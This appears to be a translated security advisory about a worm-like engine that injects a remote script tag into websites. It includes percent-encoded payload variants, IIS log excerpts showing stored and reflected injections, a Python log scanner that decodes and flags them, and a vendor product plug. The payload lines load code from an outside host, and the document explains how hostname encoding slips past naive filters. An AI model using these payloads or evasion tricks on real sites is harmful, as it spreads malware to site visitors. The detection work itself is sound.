Recently a new Trojan-injection engine has begun to appear. Searching Google for "com/c.js" shows that roughly 16,200 websites have already been infected with this Trojan.
The Security Umbrella research findings are as follows:
The engine continuously submits its Trojan code to sites it discovers by crawling the web. The payload looks like this:
%D3%AA%D1%F8<SCRIPT%20src=http://3bomb.%63%6fm/C.JS></SCRIPT>
The middle part (the hostname) is constantly mutated, for example:
<SCRIPT%20src=http://3B%6f%6db.com/C.js></SCRIPT>
<SCRIPT%20src=http://%33bomb.com/c.js></SCRIPT>
Each variant percent-encodes a different subset of the hostname's characters, so the literal string 3bomb.com never appears in the request, yet every variant decodes to the same http://3bomb.com/c.js. A filter that matches on the raw string will therefore miss it; the request has to be decoded (more than once, since the log below shows double-encoded forms such as %256f) before comparison.
The IIS log is as follows (columns: time, site, server IP, method, URI stem, query string, port, user, client IP, user agent, status):
09:18:25 w3svc9 221.130.199.26 get /Xueyuan/list2.aspx name=%B2%DF%C2%D4%3cscript+SRC%3dhttp%3A%2f%2f3b%256f%256db.com%2fc.js%3E%3C%2fscript%3E 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0
11:37:41 w3svc9 221.130.199.26 get /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:41 w3svc9 221.130.199.26 get /uploadfiles/templates<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:41 w3svc9 221.130.199.26 get /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 200 0 0
11:37:41 w3svc9 221.130.199.26 get /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+windows+nt+5.1;+sv1) 200 0 0
11:37:41 w3svc9 221.130.199.26 get /uploadfiles/templates<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/templates<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/templates<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:42 w3svc9 221.130.199.26 get /uploadfiles/templates<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT><SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
21:07:14 w3svc9 221.130.199.26 get /food/list.aspx Title=%BD%A1%BF%B5<SCRIPT%20src=http://3B%6f%6db.com/c.js></SCRIPT><SCRIPT%20src=http://%33bomb.com/c.js></SCRIPT> 80 - 2018.0.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0
Two kinds of entry appear here. The 09:18 and 21:07 requests carry the encoded payload in the query string of an .aspx page and come from the Yahoo! Slurp crawler, i.e. the poisoned URLs are being replayed by search engines. The 11:37 requests come from an ordinary IE browser and have the <SCRIPT> tag inside the URI stem itself, appended to image paths under /uploadfiles/: the payload has already been stored in the site's own content and is being served back to visitors, whose browsers then request these corrupted image paths.
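As an added example (not code from this post or from Safe3), the Python below normalizes the encoded payload variants shown above and then scans IIS W3C log lines for them, separating injection attempts in the query string from requests whose URI stem already carries the stored payload. It assumes the column order visible in the log excerpt; the embedded log lines are constructed, modeled on the post's entries rather than copied; and the crawler user-agent list, the "attempt"/"infected" labels and all helper names are this example's own choices.

```python
"""Decode URL-encoded <script src=...> injections and scan IIS W3C logs for them.

Added example, not the post's own code. Assumes the IIS W3C field order listed
in FIELDS (the order visible in the post's log excerpt). Sample log lines are
constructed, modeled on the post's entries.
"""
import re
from urllib.parse import unquote

# Matches a script tag after decoding; group 1 is the host the script is loaded from.
INJECTED_SCRIPT = re.compile(r'''<script\s+src\s*=\s*["']?https?:/+([^/\s"'>]+)''',
                             re.IGNORECASE)
# Search-engine crawlers (assumed list): a hit here means a poisoned URL is being
# replayed from a search index rather than sent by the injection engine itself.
CRAWLER_UA = re.compile(r'slurp|googlebot|baiduspider|msnbot', re.IGNORECASE)

# IIS W3C columns assumed for this example.
FIELDS = ['time', 's-sitename', 's-ip', 'cs-method', 'cs-uri-stem', 'cs-uri-query',
          's-port', 'cs-username', 'c-ip', 'cs(User-Agent)', 'sc-status',
          'sc-substatus', 'sc-win32-status']

# The three hostname mutations shown in the post, plus the double-encoded form
# seen in the query-string log entry (%256f -> %6f -> 'o').
VARIANTS = [
    '<SCRIPT%20src=http://3bomb.%63%6fm/C.JS></SCRIPT>',
    '<SCRIPT%20src=http://3B%6f%6db.com/C.js></SCRIPT>',
    '<SCRIPT%20src=http://%33bomb.com/c.js></SCRIPT>',
    '%3cscript+SRC%3dhttp%3A%2f%2f3b%256f%256db.com%2fc.js%3E%3C%2fscript%3E',
]

# Constructed sample log, modeled on the post's IIS entries (not copied verbatim).
SAMPLE_LOG = """\
#Fields: time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
09:18:25 W3SVC9 221.130.199.26 GET /Xueyuan/list2.aspx name=%B2%DF%C2%D4%3cscript+SRC%3dhttp%3A%2f%2f3b%256f%256db.com%2fc.js%3E%3C%2fscript%3E 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp) 302 0 0
11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<SCRIPT+src=http:/3bomb.com/c.js></SCRIPT> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 302 0 0
11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+windows+nt+5.1) 200 0 0
21:07:14 W3SVC9 221.130.199.26 GET /food/list.aspx Title=%BD%A1%BF%B5<SCRIPT%20src=http://3B%6f%6db.com/c.js></SCRIPT><SCRIPT%20src=http://%33bomb.com/c.js></SCRIPT> 80 - 208.0.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China) 302 0 0
"""


def normalize(value, max_rounds=4):
    """Undo percent-encoding repeatedly until it stops changing (the engine
    double-encodes), treat '+' as a space, and lower-case the result.
    latin-1 keeps the GBK keyword bytes (%B2%DF...) as-is instead of failing."""
    s = value
    for _ in range(max_rounds):
        decoded = unquote(s.replace('+', ' '), encoding='latin-1')
        if decoded == s:
            break
        s = decoded
    return s.lower()


def injected_hosts(value):
    """Hosts of every <script src=...> tag hidden in a raw stem or query value."""
    return [m.group(1) for m in INJECTED_SCRIPT.finditer(normalize(value))]


def parse_w3c_line(line):
    """Split one W3C log line into a dict by FIELDS; comment lines yield None."""
    parts = line.split()
    if line.startswith('#') or len(parts) < len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def scan_log(text):
    """Classify each line: 'attempt' = payload in the query string (engine or a
    crawler replaying a poisoned URL); 'infected' = payload already inside the
    URI stem, i.e. served from the site's own stored content."""
    findings = []
    for line in text.splitlines():
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        query_hosts = injected_hosts(rec['cs-uri-query'])
        stem_hosts = injected_hosts(rec['cs-uri-stem'])
        if not query_hosts and not stem_hosts:
            continue
        findings.append({
            'time': rec['time'],
            'kind': 'attempt' if query_hosts else 'infected',
            'hosts': sorted(set(query_hosts + stem_hosts)),
            'client': rec['c-ip'],
            'crawler': bool(CRAWLER_UA.search(rec['cs(User-Agent)'])),
        })
    return findings


if __name__ == '__main__':
    for v in VARIANTS:
        print(v, '->', injected_hosts(v))
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Running it shows all four encodings collapsing to the single host 3bomb.com, and the log scan flags the two crawler requests as attempts and the image request as an already-infected resource while leaving the clean top_search.jpg request alone. The same normalize-then-match step is what a request filter in front of the application has to perform; matching on the raw bytes is exactly what the hostname mutations are designed to defeat.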
This engine injects the Trojan through cookies, GET and POST parameters, and uses search engines to find target websites and inject them automatically, so it behaves somewhat like a worm.
Security Umbrella 2009 Enterprise Edition can effectively block this kind of disguised (encoded) injection.
Download: http://safe3wp.safe3.com.cn/download.htm